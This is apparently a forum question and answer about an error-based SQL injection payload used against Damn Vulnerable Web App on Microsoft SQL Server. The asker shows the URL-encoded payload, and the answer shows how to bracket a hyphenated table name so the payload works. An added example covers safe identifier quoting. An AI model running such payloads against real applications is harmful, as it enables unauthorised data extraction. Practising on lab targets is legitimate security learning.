I am working with Damn Vulnerable Web App against a Microsoft SQL Server. My question is actually quite straightforward, but can be misinterpreted quite easily. Basically, this is my query:
+AND+1=convert(int,
(select+
top+1+
user+
from+
TBL-Users
)
)--
Now my question is simple. This is the query to extract data from the columns. How do I craft it so that it allows me to extract data from this column? Because apparently, it does not like that I am using the '-' character in this query (but that's the table name).
According to this error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '-'.
How can I work around this, and get the data from the column assuming that the '-' character is in the table name?
In SQL-Server you can basically use most of the reserved words and special characters inside []:
select * from [TBL-Users]
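The delimiting rules behind this answer, as an added T-SQL example that is not part of the original answer: it shows why the unquoted name fails to parse, the two delimiter forms, and how `QUOTENAME` plus a catalog lookup keeps a caller-supplied table name safe in dynamic SQL. The table contents, the `@tbl` variable and the `odd]name` value are constructed for illustration.

```sql
-- Constructed demo table; the name mirrors the one in the question.
-- USER is a reserved word in T-SQL, so the column name is delimited as well.
CREATE TABLE [TBL-Users] ([user] nvarchar(50) NOT NULL);
INSERT INTO [TBL-Users] ([user]) VALUES (N'alice');  -- constructed sample row

-- Unquoted, the parser stops at the hyphen after TBL and reports
-- "Incorrect syntax near '-'" (left commented out so the batch runs):
-- SELECT TOP 1 [user] FROM TBL-Users;

-- Bracket-delimited identifiers work regardless of session settings.
SELECT TOP 1 [user] FROM [TBL-Users];

-- Double quotes are the ANSI delimiter; SQL Server treats them as
-- identifier delimiters only while QUOTED_IDENTIFIER is ON.
SET QUOTED_IDENTIFIER ON;
SELECT TOP 1 "user" FROM "TBL-Users";

-- A closing bracket inside a name has to be doubled. QUOTENAME adds the
-- brackets and performs that doubling, so the result is always one identifier.
SELECT QUOTENAME(N'TBL-Users') AS quoted_plain,
       QUOTENAME(N'odd]name')  AS quoted_with_bracket;

-- Dynamic SQL that accepts a table name: confirm the name exists in the
-- catalog, delimit it with QUOTENAME, and never concatenate it raw.
DECLARE @tbl sysname = N'TBL-Users';   -- hypothetical caller-supplied value
DECLARE @sql nvarchar(max);

IF EXISTS (SELECT 1 FROM sys.tables WHERE name = @tbl)
BEGIN
    SET @sql = N'SELECT TOP 1 [user] FROM ' + QUOTENAME(@tbl) + N';';
    EXEC sys.sp_executesql @sql;
END
ELSE
    RAISERROR(N'Unknown table name.', 16, 1);

DROP TABLE [TBL-Users];  -- clean up the demo table
```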